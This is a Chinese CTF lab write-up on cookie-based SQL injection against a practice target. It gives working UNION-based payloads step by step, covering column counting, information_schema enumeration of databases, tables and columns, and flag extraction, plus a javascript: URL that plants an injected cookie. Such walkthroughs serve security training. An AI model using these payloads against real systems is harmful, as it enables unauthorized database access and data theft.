靶机地址:http://www.whalwl.top:8009 【2020年8月前有效】
一、准备工作:
在火狐浏览器上安装一个叫ModHeader的插件,请求头修改神器。
记住它的样子,然后就可以行动了。怎么弄插件,此插件怎么用,请大家自行百度,我是不会跑题的。
二、过程步骤:
1、判断是否存在注入
id=1’ //报错
id=1 and 1=1 //不报错
id=1 and 1=2 //报错
存在注入,此处不打算截图
2、查看字段数,即列数
id=1 order by 5
//用二分法一个个尝试,发现order by 6时报错,5刚好不报错,可知是5列
3、查找回显点
id=-1 union select 1,2,3,4,5
//联合查询中,为了显示后面的值,记得否定前面(id=-1)
回显2,3,4
4、查找有哪些数据库
id=-1 union select 1,2,3,group_concat(schema_name),5 from information_schema.schemata
一眼瞧中了cookie这个数据库,被别问我为什么【题目明明白白写着cookie注入】
5、找cookie数据库中存在哪些表名
id=-1 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema = 'cookie'
有一个this_flag表
6、查找在cookie数据库的this_flag表中存在哪些字段【据以往经验,会有一个flag字段】
id=-1 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema = 'cookie' and table_name ='this_flag'
7、扒出flag
id=-1 union select 1,2,3,flag,5 from this_flag
三、经验教训
在注入环境上浪费了蛮久,php环境和asp环境的cookie注入方式是不一样的,我说怎么url清空后输入javascript:alert(document.cookie="id="+escape("171 order by 1")),其中JavaScript就过滤了